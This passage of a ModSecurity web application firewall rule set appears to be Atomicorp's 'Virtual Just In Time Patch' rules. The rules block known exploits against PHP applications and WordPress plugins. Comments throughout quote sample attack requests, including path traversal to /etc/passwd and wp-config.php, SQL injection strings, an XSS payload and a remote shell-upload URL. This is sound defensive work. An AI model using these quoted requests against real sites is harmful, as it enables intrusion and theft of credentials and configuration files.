"chain,capture,phase:2,deny,log,auditlog,id:393721,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Yeager CMS SSRF attack blocked '" SecRule ARGS:dbhost "^(?:127|10|172\.16|192)\." "t:none" #/_admin/site.link-list.php SecRule REQUEST_URI "_admin/site\.link-list\.php" "chain,capture,phase:2,deny,log,auditlog,id:393720,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Grawlix 1.0.3: Code Execution '" SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)$" "t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace" ## multipart/form-data name evasion attempts SecRule REQUEST_URI "kcfinder/browse\.php\?type=image" "chain,capture,phase:2,deny,log,auditlog,id:393719,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CouchCMS 1.4.5: Code Execution attack blocked'" SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)$" "t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace" #/main_bigware_43.php/main_bigware_79.php SecRule REQUEST_URI "/main_bigware_[0-9]+\.php/main_bigware_[0-9]+\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:364577,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Bigware Shop 2.3.01 File Upload Attack blocked'" #/web/download_file.php?file=../../app/etc/local.xml SecRule REQUEST_FILENAME "web/download_file\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344577,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Magmi file recursion attack '" SecRule ARGS:file "\.\./\.\./" "t:none,t:urlDecodeUni" #/files/attach/attachement_6/backdoor.php5 SecRule REQUEST_FILENAME "/files/attach/attachement.*/.*\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjeQtor 4.5.2 Shell Upload attack'" #persistant=*'"` SecRule REQUEST_FILENAME "/main\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Centreon 2.6.1 Command Injection Vulnerability attack'" SecRule ARGS:persistant "\'\"\`" "t:none,t:urlDecodeUni" #/avatar/image_name /.*php2345 SecRule REQUEST_FILENAME "/avatar/image_name/.*\.ph(?:p|tml|t)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Collabtive 2.0 Shell Upload attack'" #img/media/.*/.*.php #SecRule REQUEST_FILENAME "/img/media/.*/.*\.ph(?:p|t|tml)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343480,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Centreon 2.6.1 Unrestricted File Upload Vulnerability attack'" #/test/logo/.*php SecRule REQUEST_FILENAME "/test/logo/.*\.ph(?:p|t|tml)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343481,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vtiger CRM 6.3 Remote Code Execution attack'" #/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%22%3Ealert(%27xss%27)%3C/script%3E%3Cscript%20src=%22 SecRule REQUEST_FILENAME "js/window\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin Navis Documentcloud XSS Vulnerability attack'" SecRule ARGS:wpbase "(?:script|\" ?>)" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace" SecRule REQUEST_URI "/pluck/" "id:335895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:349303,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_PLUCK" SecRule REQUEST_FILENAME "pluck/admin\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pluck remote code injection attack '" SecRule ARGS:action "files" "chain,t:none,t:lowercase" Secrule REQUEST_BODY "php" "t:none,t:lowercase" #files/phpinfo.php5 SecRule REQUEST_FILENAME "pluck/files/phpinfo\.php5" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pluck recon phpinfon attack '" SecMarker END_PHP_JITP_PLUCK #wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20-- #version() ; -- SecRule REQUEST_FILENAME "get_album_item\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack'" SecRule ARGS:size "(?:version|--| )" "t:none,t:urlDecodeUni,t:lowercase" #WordPress WP Symposium Plugin 15.1 - Blind SQL Injection SecRule REQUEST_FILENAME "forum_functions\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack'" SecRule ARGS:topic_id "(?:sleep|select|\(| )" "t:none,t:urlDecodeUni,t:lowercase" #avatarurl=http://localhost:11211 #profile.php SecRule REQUEST_FILENAME "profile\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin Memcache Remote Code Execution Attack'" SecRule ARGS:avatarurl "https?\://(?:localhost|127\.)" "t:none,t:urlDecodeUni,t:lowercase" #Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution SecRule REQUEST_FILENAME "/userfiles/media/[a-z]+/uploaded/*\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution attempt'" #These really asrent necessary, the generic rules already stop these #WordPress WPTF Image Gallery 1.03 File Download #/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd #Remote file download in simple-image-manipulator v1.0 wordpress plugin #/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd" #/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd #/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd SecRule REQUEST_FILENAME "(?:wptf-image-gallery/lib-mbox/ajax_load\.php|simple-image-manipulator/controller/download\.php|recent-backups/download-file\.php|candidate-application-form/downloadpdffile\.php)" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:337473,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic wordpress plugins Upload Filter Bypass Remote file access attempt'" SecRule ARGS:url|ARGS:filename|ARGS:file_link|ARGS:filepath "/(?:etc|home|var|root|usr)/" "t:none,t:urlDecodeUni,t:lowercase" #WordPress Fast Image Adder 1.1 Shell Upload #/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://192.168.0.2/shell.php SecRule REQUEST_FILENAME "/plugins/fast-image-adder/fast-image-adder-uploader\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:337474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack'" SecRule ARGS:url "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" #https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe SecRule REQUEST_FILENAME "/index\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack'" SecRule &ARGS:Action "@eq 1" "t:none,chain" SecRule ARGS:current_dir "^[a-z]\:" "chain,t:none,t:urlDecodeUni,t:lowercase" SecRule ARGS:cmd "\.exe$" "t:none,t:urlDecodeUni,t:cmdLine" #admin-ajax.php attacks SecRule REQUEST_URI "/uploadify\.php" "id:335867,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:349313,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_UPLOADIFY" #folder=%2fwordpress%2fwp%2dcontent%2fplugins%2fwp%2dproperty%2fthird%2dparty%2fuploadify%2f #folder=/wordpress/wp-content/plugins/wp-property/third-party/uploadify/ #wp-content/plugins/barclaycart/uploadify SecRule REQUEST_URI "/uploadify\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress uploadify upload Attack'" SecRule ARGS:folder "/wp-content/.*/uploadify/" "t:none,t:urlDecodeUni,t:lowercase" #Block anything thats not jpg,jpeg,gif,png,mpg,mpeg,flv SecRule REQUEST_URI "/uploadify\.php" "capture,phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337471,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uploadify non-media file upload violation',logdata:'%{TX.0}'" SecRule ARGS:Filename|ARGS:Filedata "!((?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df|s)|gif|ico|avi|w(?:mv|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" "t:none,t:urlDecodeUni,t:lowercase" SecRule REQUEST_URI "/uploadify\.php" "capture,phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337476,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uploadify RFI attack blocked',logdata:'%{TX.0}'" SecRule ARGS:src "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/" "t:none,t:urlDecodeUni,t:lowercase" SecMarker END_PHP_JITP_UPLOADIFY SecRule REQUEST_URI "wp-admin/(?:index|admin-ajax)\.php" "chain,capture,phase:2,deny,log,auditlog,id:393726,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress WooCommerce Privilege Escalation'" SecRule ARGS:action "nuke" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:/woo_st/ "1" "t:none,t:urlDecodeUni,t:lowercase" #action=nuke&woo_st_products=1 #admin-ajax.php attacks SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "id:335865,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:349300,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_ADMIN_AJAX1" #/wordpress/wp-admin/admin-ajax.php #action=wpuf_file_upload SecRule ARGS:action "wpuf_file_upload" "capture,phase:2,deny,log,auditlog,id:393725,rev:1,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress WP User Frontend Plugin Unrestricted File Upload blocked'" #Just the silly test case, in case someone panics that the POC "worked" #wp-admin/admin-ajax.php\?action=umm_switch_action &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP" SecRule REQUEST_URI "wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:393723,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Blind SQLi POC blocked'" SecRule ARGS:umm_user "(?:sleep|\b(?:select|union) )" "t:none,t:urlDecodeUni,t:lowercase,t:removecomments" SecRule ARGS:umm_sub_action "umm_get_csv" "capture,phase:2,deny,log,auditlog,id:393727,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked'" SecRule ARGS:umm_sub_action "umm_backup" "chain,capture,phase:2,deny,log,auditlog,id:393728,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked'" SecRule ARGS:mode "sql" "t:none,t:urlDecodeUni,t:lowercase" SecRule REQUEST_URI "wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:393724,rev:1,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Privilege Escalation attack blocked'" SecRule ARGS:umm_meta_value "administrator" "t:none,t:urlDecodeUni,t:lowercase" #new revslider vuln #/wp-admin/admin-ajax.php #action=revslider%5fajax%5faction&client%5faction=update%5fplugin #action=revslider_ajax_action&client_action=update_plugin #action=revolution-slider_ajax_action&client_action=update_plugin #Cookie: #/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337469,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Revslider upload Attack'" SecRule ARGS:action "(?:revslider_ajax_action|revolution-slider_ajax_action)" "chain,t:none,t:urlDecodeUni,t:lowercase" SecRule ARGS:client_action "(?:update_plugin|get_captions_css)" "chain,t:none,t:urlDecodeUni,t:lowercase" SecRule &ARGS:nonce "@eq 0" #/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337479,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Revslider non-image file download Attack'" SecRule ARGS:action "revslider_show_image" "chain,t:none,t:urlDecodeUni,t:lowercase" SecRule ARGS:img "\.php" "t:none,t:urlDecodeUni,t:lowercase" SecMarker END_PHP_JITP_ADMIN_AJAX1 #Wordpress XSS SecRule REQUEST_URI "/wp-comments-post.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:336469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Stored XSS Attack',logdata:'%{TX.0}'" SecRule ARGS:/comment/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|< ?/?i?frame|\%env|(?:\.add|\@)import |asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=.|shell\:|window\.location|asfunction:_root\.launch)" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace" #plugin_googlemap2_proxy.php?url=loxer.cf SecRule REQUEST_URI "plugin_googlemap(?:2_proxy|3_kmlprxy)\.php\?url=(.*)" "phase:1,t:none,t:urlDecodeUni,t:lowercase,capture,chain,log,deny,status:403,auditlog,id:336468,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Google Maps plugin for Joomla probe'" SecRule TX:1 "!@beginsWith %{request_headers.host}" "t:none,t:lowercase" #/plus/download.php?open SecRule REQUEST_URI "/plus/download\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336467,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible chained PHP array injection attack',logdata:'%{TX.0}'" SecRule &ARGS:/^arrs1\[\]/ "@gt 1" SecRule REQUEST_URI "/ofc_upload_image\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336460,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Open Flash Charts File Upload Attack',logdata:'%{TX.0}'" SecRule ARGS:name "\.(?:php|pl|cgi)" "t:none,t:lowercase" #rsession_init.php?PHPSESSID=000000000000000000000000000000000&failure_redirect_url SecRule REQUEST_URI "/rsession_init\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336459,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Plesk secret_key attack',logdata:'%{TX.0}'" SecRule ARGS:failure_redirect_url "^(.*)$" "capture,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase" SecRule TX:1 "!@rx ://%{SERVER_NAME}/" "t:none,t:lowercase" #WP pingback #Only uses two headers, URL and Host #Check for useragent header, if missing, attack SecRule REQUEST_URI "/xmlrpc\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336359,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress pingback zombie attack',logdata:'%{TX.0}'" SecRule XML:/* "pingback\.ping" "t:none,t:lowercase,chain" SecRule &REQUEST_HEADERS:Host "@eq 1" "t:none,chain" SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none" #Vbulletin zeroday #upgrade.php #version=install #htmldata=username SecRule REQUEST_URI "/upgrade\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331358,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vbulletin zero day attack',logdata:'%{TX.0}'" SecRule ARGS:version "install" "t:none,t:lowercase,chain" SecRule ARGS:htmldata[username] ".*" "t:none,t:lowercase,t:urlDecodeUni" #AES_ENCRYPT SecRule REQUEST_URI "/(?:clientarea\.php\?action=details|viewticket\.php)" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331357,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WHMCS SQL injection attack',logdata:'%{TX.0}'" SecRule ARGS:firstname|ARGS:lastname|ARGS:/^tid/ "(?:aes_encrypt|tbl(?:admins|clients|hosting|servers|tickets|contact|registars|invoices|orders|paymentgateways|verificationdata|gatewaylog|domains|accounts|adminlog))" "t:none,t:lowercase" #WP 3.6 and lower serialize name change exploit SecRule REQUEST_URI "wp-admin/profile.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:321357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress serialize name change attack',logdata:'%{TX.0}'" SecRule ARGS:first_name|ARGS:last_name|ARGS:display_name ":" "t:none,t:urlDecodeUni" #configuration.php-dist SecRule REQUEST_FILENAME "configuration\.php-dist" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:321356,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla probe',logdata:'%{TX.0}'" #/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/ SecRule REQUEST_FILENAME "/editor/filemanager/connectors/php/connector\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:388000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Attempt to Access vulnerable FCKeditor file upload connector (Disable if you have configured this connector to require authentication)',logdata:'%{TX.0}'" SecRule ARGS:command "(?:getfoldersandfiles|fileupload)" "t:none,t:urlDecodeUni,t:lowercase" #PHP version probe using easter eggs SecRule REQUEST_URI "php(?:e9568f3[56]-d428-11d2-a769-00aa001acf42|b8b5f2a0-3c92-11d3-a3a9-4c7b08c10000)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380800,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Easter Egg Access',logdata:'%{TX.0}'" SecRule REQUEST_URI "phpe9568f34-d428-11d2-a769-00aa001acf42" "phase:2,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380801,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Easter Egg Access',logdata:'%{TX.0}'" #INJECTION RULES ##RFI/injection rules SecRule ARGS|REQUEST_URI "@pm http:// https:// ftp:// ftps:// ogg:// zlib:// gopher:// php:// data://" "id:333866,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:309001,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_INJECTION_RULES" #plugin injection SecRule REQUEST_FILENAME "\.php" "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:390760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'" SecRule ARGS:/plugin_dir/ "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" #e107 vulns SecRule ARGS:ifile|ARGS:plugindir|ARGS:THEMES_DIRECTORY "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:393756,rev:1,severity:1,t:none,t:htmlEntityDecode,t:urlDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:e107 RFI attack',logdata:'%{TX.0}'" #390655 SecRule ARGS:/^SYSURL/ "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:390655,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SYSURL RFI attack Vulnerability'" SecRule ARGS:get "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:390656,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: get variable RFI attack Vulnerability'" # Rule 310019: generic remote file inclusion vulns SecRule ARGS:/gallery_basedir/|!ARGS:include_location "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:391760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'" SecRule REQUEST_FILENAME "tiki-index\.php" "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:395760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'" SecRule ARGS:page "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # Rule 310054: b2 cafelog gm-2-b2.php remote file include attempt SecRule REQUEST_FILENAME "/gm-2-b2\.php" "phase:2,id:310054,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: b2 cafelog gm-2-b2.php remote file include attempt',chain" SecRule REQUEST_URI "b2inc=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310055: BLNews objects.inc.php4 remote file include attempt SecRule REQUEST_FILENAME "/objects\.inc\.php" "phase:2,id:310055,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: BLNews objects.inc.php4 remote file include attempt',chain" SecRule REQUEST_URI "server\[path\]=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310056: ttCMS header.php remote file include attempt SecRule REQUEST_FILENAME "/admin/templates/header.php" "phase:2,chain,id:310056,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttCMS header.php remote file include attempt'" SecRule REQUEST_URI "admin_root=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310059: pmachine remote file include attempt SecRule REQUEST_URI "lib\.inc\.php" "phase:2,id:310059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pmachine remote file include attempt',chain" SecRule ARGS:pm_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310090:/forum/viewtopic.php?x=http:// SecRule REQUEST_FILENAME "/forum/viewtopic\.php" "phase:2,chain,id:310090,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Forum remote include attempt'" SecRule ARGS:x "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310227:/auth.php?path=http://[attacker]/ SecRule REQUEST_FILENAME "/authphp" "phase:2,chain,id:310227,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.php remote file inclusion attempt'" SecRule ARGS:path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310233: PHP Form Mail Script File Incusion vuln SecRule REQUEST_FILENAME "/inc/formmail\.inc\.php" "phase:2,chain,id:310233,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP formmail.inc.php file inclusion attempt'" SecRule ARGS:script_root "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310234: download Center Lite command execution vuln SecRule REQUEST_FILENAME "/inc/download_center_lite\.inc\.php" "phase:2,chain,id:310234,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: download Center Lite download_center_lite.inc.php command execution attempt'" SecRule ARGS:script_root "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310235: /modules/mod_mainmenu.php?mosConfig_absolute_path=http:// SecRule REQUEST_FILENAME "/modules/mod_mainmenu\.php" "phase:2,chain,id:310235,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mod_mainmenu.php command execution attempt'" SecRule ARGS:mosConfig_absolute_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310236: phpWebLog command execution SecRule REQUEST_FILENAME "/init\.inc\.php" "phase:2,chain,id:310236,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog init.inc.php command execution attempt'" SecRule ARGS:G_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310238: mcNews command execution SecRule REQUEST_FILENAME "/admin/header\.php" "phase:2,chain,id:310238,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcNews header.php command execution attempt'" SecRule ARGS:skinfile "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # Rule 310240: votebox SecRule REQUEST_URI "/votebox\.php\?voteboxpath=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310240,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: votebox.php command execution attempt'" # Rule 310267: Remote File Inclusion Vulnerability in phpWebLog SecRule REQUEST_URI "/include/init\.inc\.php\?G_path=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310267,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog init.inc.php remote file inclusion attempt'" # Rule 310293: PHPOpenChat SecRule ARGS:poc_root_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310293,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: poc_root_path remote file inclusion attempt'" # Rule 310295: PHPOpenChat SecRule REQUEST_URI "/poc\.php\?sourcedir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310295,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPOpenChat poc.php remote file inclusion attempt'" # Rule 310297: mcNews Remote command execution SecRule REQUEST_URI "/admin/install\.php\?l=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" 